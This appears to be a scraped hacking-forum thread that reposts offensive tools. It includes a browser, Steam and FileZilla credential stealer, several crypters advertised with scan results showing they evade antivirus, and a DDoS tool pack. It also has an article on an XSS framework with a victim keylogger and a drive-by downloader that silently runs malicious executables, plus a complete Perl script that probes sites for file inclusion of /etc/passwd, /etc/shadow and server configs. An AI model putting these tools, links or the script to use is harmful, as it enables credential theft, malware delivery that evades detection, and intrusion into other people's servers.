.Slacker

Changes v-60712: --disable-hash --disable-like --output-dir=ODIR --dbms-cred=DCRED sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. * On Windows: * # Download and install Python 2.7*: ActivePython Downloads - Download Python Packages for Windows, Linux and Mac | ActiveState # Download %name%.zip and unzip to sqlmap dir # run sqm.pyw * On Debian or Ubuntu: * # sudo apt-get install python-tk python2.7 sakura # git clone: github.com/sqlmapproject/sqlmap.git # cd sqlmap # wget http://gui-for-sqlmap.googlecode.com/files/sqm-60712.zip # unzip sqm-60712.zip # python2.7 sqm.pyw Hot Keys: ? F1 - Help! ? F2 - get query ? Shift_L+F2 - start ? Alt_L+s - SQLmap Command Builder ? Alt_L+l - Log viewer ? Alt_L+e - Editor ? Alt_L+r - load and reload log file ? Alt_L+1 - Settings ? Alt_L+2 - Injection | Detection | Technique ? Alt_L+3 - Request ? Alt_L+4 - Enumeration ? Alt_L+5 - Access Sample Screen Shoot: Download Link: Download sqm.60712(1).zip @ UppIT Read more in here: gui-for-sqlmap - SQLmap Command Builder: select options -> get query -> start - Google Project Hosting Sursa: seclist.us

Bug Fix latest released: - Dork scanner acts less quirky. - Dumping functions' bugs fixed. - Optimized for ActivePerl - Added examples. Precision & point-n-shoot attacks specified for MySQL and MSSQL vulnerabilities. This project is a remix and revisit of my previous injector SlowQL (also written in Perl) Features: ? Support both MySQL and MSSQL attacks ? Vulnerability Dork Scanner/Checker ? Quick & Custom dumping function ? Evasion techniques ? Friendly CLI ? Written in Perl (not really a feature but I guess everyone likes the good old perl) Download Link: puppy.pl-1.1.zip (5.2 KB) Read more in here: puppy-pl - MySQL/MSSQL Scanner & Injector - Google Project Hosting Sursa: seclist.us

Options: [+] - Assembly Changer [+] - Firefox (Toutes Versions) [+] - Internet Explorer(Toutes Versions) [+] - Chrome (Toutes Version) [+] - Opéra (Toutes Version) [+] - Messenger [+] - Steam [+] - FileZilla Scan: Archivo: stub.exe Tamaño: 573952 Bytes MD5: 7f972b06f955c17df971393cf36c660d SHA1: 4f1eddbe0fed41f29d7b29f62ad0c2588746684a Resultado: 1/35 Estado: Infectado AVG Free - OK ArcaVir - OK Avast 5 - OK AntiVir (Avira) - TR/Dropper.Gen BitDefender - OK VirusBuster Internet Security - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Rising Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Vexira Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK Immunet Antivirus - OK K7 Ultimate - OK VIPRE - OK Download Link: https://www.box.com/s/f1f452bbb5c200bfccf9 Password: +------------+ | level-23.biz | +------------+

Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 2nd Vulnerability in the OWASP 2010 Web application Vulnerabilities list. Figure 1: Top 10 Web Application Vulnerabilities OWASP Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS. Threats due to XSS XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver. Client side code injection: A hacker can inject malicious codes and execute them at client side. DOS: A hacker can perform DOS against a remote server or against the client itself. Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim. Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS. Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim. Defacing: Temporary or permanent defacement of web application is possible. Need for a new Tool Many tools are available for detecting XSS vulnerabilities in web applications. But most of these are not so easier to use or you should specify XSS payloads manually. So I thought of the possibility of a new user friendly tool with a payload list to test against XSS in a web application. After a 5 months research, I built a XSS payload database of over 350+ XSS payloads and implemented a tool in VB.NET and that is Xenotix XSS Exploit Framework. What is Xenotix XSS Exploit Framework? Figure 2: Xenotix XSS Exploit Framework Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner. It provides a penetration tester the ability to test all the possible XSS payloads available in the payload list against a web application with ease. The tool supports both manual mode and automated time sharing based test modes. It includes a XSS encoder, a victim side keystroke logger, and an Executable Drive-by downloader. Features of Xenotix XSS Exploit Framework The features of Xenotix XSS Exploit Framework are ? Built in XSS Payloads ? XSS Key logger ? XSS Executable Drive-by downloader ? Automatic XSS ? XSS Encoder Built in Payload List It is having an inbuilt XSS payload list of above 350+ XSS payloads. It includes HTML5 compactable XSS injection payloads. Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list. Figure 3: XSS Payload count in different Vulnerability Scanners The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. So it’s clear that Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list. XSS Keylogger Figure 4: XSS Keylogger Working The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP. PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file. XSS Executable Drive-by Downloader Figure 5: Executable Drive-by Downloader Working[/size Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim. Automatic XSS Testing The tool is having an automatic test mode based on a time interval. You have to specify the time interval according to the time taken by a webpage to load which depends on your bandwidth. It will test all the payloads one by one after the specified time interval. With this feature automated XSS testing can be done. You don’t have to check all the 350+ payloads manually. XSS Encoder The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions. Testing a website with Xenotix XSS Exploit Framework To test a website URL, say http://www.site.com/search.php?id=1&term=about You suspect that the variable ‘term’ is vulnerable to XSS. Figure 6: Testing a Website with Xenotix XSS Exploit Framework For testing against XSS in Xenotix XSS Exploit Framework you should specify the protocol, which is http or https. Then give the website URL other than the suspected variable in the field after the protocol and specify the suspected variable in the Variable to test field. Now select between Inbuilt XSS Payloads or Custom XSS payloads. You can select between Manual Mode and Auto Mode to start testing. Features for the Next Build Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build. Conclusion XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform Penetration test on Web Applications against XSS vulnerability. Google Vulnerability Reward Program, Facebook Bounty etc. are there. So go for XSS hunting and grab your bounty. References Papers ? Our Favorite XSS Filters/IDS and how to Attack Them - Eduardo Vela and David Lindsay. ? Blackbox Reversing of XSS Filters - Alexander Sotirov. ? Advanced Cross-Site-Scripting with Real-time Remote Attacker Control - Anton Rager ? Bypass XSS filters - k3nz0 ? XSS for Fun and Profit - Lord Epsylon ? Bypassing Web Application Firewalls (WAFs) - Ing. Pavol Lupták ? Abusing Internet Explorer 8’s XSS Filters –Eduardo Vela Nava, David Lindsay Websites ? OWASP’s Cross-site Scripting (XSS) https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) ? CGISecurity's Cross Site Scripting FAQ The Cross-Site Scripting (XSS) FAQ ? Gunter Ollmann's XSS paper Whitepapers - www.technicalinfo.net ? PeterW's Cross Site Request Forgery (CSRF) Concept SecurityFocus ? CERT info on XSS CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests ? Remote Scripting with IFRAMEs http://developer.apple.com/internet/webcontent/iframe.html ? Cross Site Scripting - XSS - The Underestimated Exploit Cross site scripting / XSS - How to find & fix it with a web scanner Credits: Ajin Abraham Sursa: level-23.biz

A Modular Framework for Web Services Penetration Testing WS-Attacker is a modular framework for web services penetration testing. It is a free and easy to use software solution, which provides an all-in-one security checking interface with only a few clicks. Added XML Signature Wrapping Plugin: - Technique for automatically attacking XML Signature protected Web Services - Just set the endpoint and follow the instructions on the Plugin Config screen Framework Changes: - Options Window is now Scrollable - Some minor changes. Download Link: WS-Attacker | Free Security & Utilities software downloads at SourceForge.net Sursa: level-23.biz

Scan: Archivo: Zeta.exe SHA1: d5634c9c4709de63807610793bc8c2a0175a6bd7 Fecha scan: 12-09-12,06:51:00 Reporte generado por LeVeL-23 Resultado: 0 de 35 AVG Free Clean ArcaVir Clean Avast 5 Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Clean Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Rising Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Antivirus Clean K7 Ultimate Clean VIPRE Clean Scan de una Bolita: Archivo: Anotador.exe SHA1: 322431716786c967fb30cb8b0477b7eb6b56ec2c Fecha scan: 12-09-12,06:45:40 Reporte generado por LeVeL-23 Resultado: 1 de 35 AVG Free Clean ArcaVir Clean Avast 5 Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus HEUR: Trojan.Win32.Generic McAfee Clean MS Security Essentials Clean ESET NOD32 Clean Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Rising Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Antivirus Clean K7 Ultimate Clean VIPRE Clean Download Link: Zeark Crypter.rar Password: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Encryption: R22-RXB-CHC-RV

Crypter with binder and icon changer. Scan: Archivo: STUB.exe SHA1: 2801929acaf2af59dc6ad0c97c5cdebc786cfadc Fecha scan: 10-09-12,10:12:17 Reporte generado por LeVeL-23 Resultado: 5 de 35 AVG Free Clean ArcaVir Clean Avast 5 AutoIt:Agent-K [Trj] AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Worm.BAT.Autorun-2 COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data AutoIt:Agent-K [Trj] IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Trojan.Win32\/Injector.Autoit.P Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Rising Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus infected Trojan-Inject.Autoit.Irus Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Antivirus Clean K7 Ultimate Clean VIPRE Clean Download Link: http://db.tt/N8heQMWk Password: +-----------------------+ | ÆuþærÞÆgþæjÞæ2ÞævÞæhÞ | +-----------------------+ Encryption: +----------------+ | Titan > Vita13 | +----------------+

stub: Archivo: reactor.exe Tamaño: 42496 Bytes MD5: 8ab23a5bbb3805e2c52155963f487948 SHA1: 81225324d962fc095a7362a48bf01834de6da65c Resultado: 1/35 Estado: Infectado AVG Free - OK ArcaVir - OK Avast 5 - OK AntiVir (Avira) - OK BitDefender - OK VirusBuster Internet Security - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - VirTool.MSIL Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Rising Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Vexira Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK Immunet Antivirus - OK K7 Ultimate - OK VIPRE - OK Download Link: http://ge.tt/api/1/files/8mFkgnM/0/blob?download Report created by LeVeL-23.Biz

Archivo: stub.exe Tamaño: 925696 Bytes MD5: efb89fabb9edeca347e458504dd6c05b SHA1: 4be3e071b721c9205b028c4639b3204c73249039 Resultado: 2/35 Estado: Infectado AVG Free - OK ArcaVir - OK Avast 5 - OK AntiVir (Avira) - OK BitDefender - OK VirusBuster Internet Security - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - VirTool:Win32/VBInject.OS ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Rising Antivirus - OK Solo Antivirus - OK Sophos - Mal/FauxMS-A Trend Micro Internet Security - OK VBA32 Antivirus - OK Vexira Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK Immunet Antivirus - OK K7 Ultimate - OK VIPRE - OK Download Link: https://www.box.com/s/90e7a37774109365cf01 Report created by LeVeL-23.Biz

Mersi, foarte folositor.

Pici pentagonu' cu asta Glumeam, FAIL.

Bine ai venit.

10.

Welcome.

Bine ai venit.

Pentru trezire:

Lol daca i-ai dat md5 o decripteaza in havij. A si specificat, e morcovar!

LOL i se potriveste )

E prea vechi Am incercat si nu merge sa injectezi.

Hex Byte Convert Char Convert AES Encrypt ScreenShot: Download Link: CryptoSQL.7z Sursa: antichat.ru

Pack-ul contine 6 tool-uri. Download Link: [Pack] Ddos tools.rar ScreenShot-uri: 1: 2: 3: 4: 5: 6: Asta nu sunt sigur ca mai functioneaza:)

ScreenShot: Download Link: [perl] Pack Script-uri.rar PS: Nu am sursa.

use LWP::UserAgent; use HTTP::Request; regex(); header(); #data print ">Insert Link[...]\n"; print '>';chomp($link = <STDIN>); if($link !~ /http:\/\//) { $link = "http://$link"; } #httpd type scan print "\n>press [enter] to check the version of httpd[...]\n"; $httpd =<STDIN>; $host = $link; $useragent = LWP::UserAgent->new; $resp = $useragent->head($host); print $resp->headers_as_string; print "\n>press [enter] to check the vulnerability in lfi[...]\n"; $start =<STDIN>; # scanning 314 paths @vuls = ('/etc/passwd', '/etc/shadow', '/etc/group', '/etc/security/group', '/etc/security/passwd', '/etc/security/user', '/etc/security/environ', '/etc/security/limits', '/usr/lib/security/mkuser.default', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/usr/local/apache/logs/access_ log', '/usr/local/apache/logs/access. log', '/var/log/apache/access_log', '/var/log/apache2/access_log', '/var/log/apache/access.log', '/var/log/apache2/access.log', '/var/log/access_log', '/var/log/access.log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/var/log/apache/error_log', '/var/log/apache2/error_log', '/var/log/apache/error.log', '/var/log/apache2/error.log', '/var/log/error_log', '/var/log/error.log', '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/var/log/httpd/access_log', '/var/log/httpd/error_log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/apache2/logs/error.log', '/apache2/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/usr/local/apache2/logs/access_log', '/usr/local/apache2/logs/access.log', '/usr/local/apache2/logs/error_log', '/usr/local/apache2/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/var/log/httpd/access_log', '/var/log/httpd/access.log', '/var/log/httpd/error_log', '/var/log/httpd/error.log', '/var/log/apache/access_log', '/var/log/apache/access.log', '/var/log/apache/error_log', '/var/log/apache/error.log', '/var/log/apache2/access_log', '/var/log/apache2/access.log', '/var/log/apache2/error_log', '/var/log/apache2/error.log', '/var/log/access_log', '/var/log/access.log', '/var/log/error_log', '/var/log/error.log', '/opt/lampp/logs/access_log', '/opt/lampp/logs/error_log', '/opt/xampp/logs/access_log', '/opt/xampp/logs/error_log', '/opt/lampp/logs/access.log', '/opt/lampp/logs/error.log', '/opt/xampp/logs/access.log', '/opt/xampp/logs/error.log', '/Program Files\Apache Group\Apache\logs\access.log', '/Program Files\Apache Group\Apache\logs\error.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/apache/logs/error.log', '/apache/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/logs/error.log', '/logs/access.log', '/etc/httpd/logs/acces_log', '/etc/httpd/logs/acces.log', '/etc/httpd/logs/error_log', '/etc/httpd/logs/error.log', '/var/www/logs/access_log', '/var/www/logs/access.log', '/usr/local/apache/logs/access_log', '/usr/local/apache/logs/access.log', '/var/log/apache/access_log', '/var/log/apache/access.log', '/var/log/access_log', '/var/www/logs/error_log', '/var/www/logs/error.log', '/usr/local/apache/logs/error_log', '/usr/local/apache/logs/error.log', '/var/log/apache/error_log', '/var/log/apache/error.log', '/var/log/access_log', '/var/log/error_log', '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf', '/etc/apache2/httpd.conf', '/usr/local/apache/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', '/usr/local/apache/httpd.conf', '/usr/local/apache2/httpd.conf', '/usr/local/httpd/conf/httpd.conf', '/usr/local/etc/apache/conf/httpd.conf', '/usr/local/etc/apache2/conf/httpd.conf', '/usr/local/etc/httpd/conf/httpd.conf', '/usr/apache2/conf/httpd.conf', '/usr/apache/conf/httpd.conf', '/usr/local/apps/apache2/conf/httpd.conf', '/usr/local/apps/apache/conf/httpd.conf', '/etc/apache/conf/httpd.conf', '/etc/apache2/conf/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/http/conf/httpd.conf', '/etc/apache2/httpd.conf', '/etc/httpd/httpd.conf', '/etc/http/httpd.conf', '/etc/httpd.conf', '/opt/apache/conf/httpd.conf', '/opt/apache2/conf/httpd.conf', '/var/www/conf/httpd.conf', '/private/etc/httpd/httpd.conf', '/private/etc/httpd/httpd.conf.default', '/Volumes/webBackup/opt/apache2/conf/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf', '/Volumes/webBackup/private/etc/httpd/httpd.conf.default', '/Program Files\Apache Group\Apache\conf\httpd.conf', '/Program Files\Apache Group\Apache2\conf\httpd.conf', '/Program Files\xampp\apache\conf\httpd.conf', '/usr/local/php/httpd.conf.php', '/usr/local/php4/httpd.conf.php', '/usr/local/php5/httpd.conf.php', '/usr/local/php/httpd.conf', '/usr/local/php4/httpd.conf', '/usr/local/php5/httpd.conf', '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', '/usr/local/etc/apache/vhosts.conf', '/etc/php.ini', '/bin/php.ini', '/etc/httpd/php.ini', '/usr/lib/php.ini', '/usr/lib/php/php.ini', '/usr/local/etc/php.ini', '/usr/local/lib/php.ini', '/usr/local/php/lib/php.ini', '/usr/local/php4/lib/php.ini', '/usr/local/php5/lib/php.ini', '/usr/local/apache/conf/php.ini', '/etc/php4.4/fcgi/php.ini', '/etc/php4/apache/php.ini', '/etc/php4/apache2/php.ini', '/etc/php5/apache/php.ini', '/etc/php5/apache2/php.ini', '/etc/php/php.ini', '/etc/php/php4/php.ini', '/etc/php/apache/php.ini', '/etc/php/apache2/php.ini', '/web/conf/php.ini', '/usr/local/Zend/etc/php.ini', '/opt/xampp/etc/php.ini', '/var/local/www/conf/php.ini', '/etc/php/cgi/php.ini', '/etc/php4/cgi/php.ini', '/etc/php5/cgi/php.ini', '/php5\php.ini', '/php4\php.ini', '/php\php.ini', '/PHP\php.ini', '/WINDOWS\php.ini', '/WINNT\php.ini', '/apache\php\php.ini', '/xampp\apache\bin\php.ini', '/NetServer\bin\stable\apache\php.ini', '/home2\bin\stable\apache\php.ini', '/home\bin\stable\apache\php.ini', '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', '/usr/local/cpanel/logs', '/usr/local/cpanel/logs/stats_log', '/usr/local/cpanel/logs/access_log', '/usr/local/cpanel/logs/error_log', '/usr/local/cpanel/logs/license_log', '/usr/local/cpanel/logs/login_log', '/usr/local/cpanel/logs/stats_log', '/var/cpanel/cpanel.config', '/var/log/mysql/mysql-bin.log', '/var/log/mysql.log', '/var/log/mysqlderror.log', '/var/log/mysql/mysql.log', '/var/log/mysql/mysql-slow.log', '/var/mysql.log', '/var/lib/mysql/my.cnf', '/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/logrotate.d/proftpd', '/www/logs/proftpd.system.log', '/var/log/proftpd', '/etc/proftp.conf', '/etc/protpd/proftpd.conf', '/etc/vhcs2/proftpd/proftpd.conf', '/etc/proftpd/modules.conf', '/var/log/vsftpd.log', '/etc/vsftpd.chroot_list', '/etc/logrotate.d/vsftpd.log', '/etc/vsftpd/vsftpd.conf', '/etc/vsftpd.conf', '/etc/chrootUsers', '/var/log/xferlog', '/var/adm/log/xferlog', '/etc/wu-ftpd/ftpaccess', '/etc/wu-ftpd/ftphosts', '/etc/wu-ftpd/ftpusers', '/usr/sbin/pure-config.pl', '/usr/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.conf', '/usr/local/etc/pure-ftpd.conf', '/usr/local/etc/pureftpd.pdb', '/usr/local/pureftpd/etc/pureftpd.pdb', '/usr/local/pureftpd/sbin/pure-config.pl', '/usr/local/pureftpd/etc/pure-ftpd.conf', '-/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.pdb', '/etc/pureftpd.pdb', '/etc/pureftpd.passwd', '/etc/pure-ftpd/pureftpd.pdb', '/usr/ports/ftp/pure-ftpd/', '/usr/ports/net/pure-ftpd/', '/usr/pkgsrc/net/pureftpd/', '/usr/ports/contrib/pure-ftpd/', '/var/log/pure-ftpd/pure-ftpd.log', '/logs/pure-ftpd.log', '/var/log/pureftpd.log', '/var/log/ftp-proxy/ftp-proxy.log', '/var/log/ftp-proxy', '/var/log/ftplog', '/etc/logrotate.d/ftp', '/etc/ftpchroot', '/etc/ftphosts', '/var/log/exim_mainlog', '/var/log/exim/mainlog', '/var/log/maillog', '/var/log/exim_paniclog', '/var/log/exim/paniclog', '/var/log/exim/rejectlog', '/var/log/exim_rejectlog'); print ">start scaning[...]\n"; foreach $scan(@vuls){ $url = $link.$scan; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable;} else { $msg = "Not Found";} print "$scan..........[$msg]\n"; } sub regex(){ $sis="$^O";if ($sis eq windows){ $cmd="clear";} else { $cmd="cls"; } system("$cmd"); } sub header(){ print q{ RSTCenter.com }; } PS: Dupa ce am stors putin google-ul l-am gasit si aici: http://pastebin.com/4HLY5eTp